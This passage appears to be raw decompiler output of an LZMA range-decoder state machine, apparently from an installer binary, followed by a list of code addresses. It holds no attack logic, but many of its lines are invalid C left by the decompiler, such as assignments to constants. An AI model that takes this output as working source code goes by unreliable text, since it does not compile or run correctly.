											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406969
0x00406969
0x0040696d
0x00406992
0x0040699c
0x00000000
0x0040696f
0x0040696f
0x00406972
0x00406976
0x00406979
0x0040697c
0x00406980
0x00406980
0x00406983
0x00406a5d
0x00406a5d
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00406a1b
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
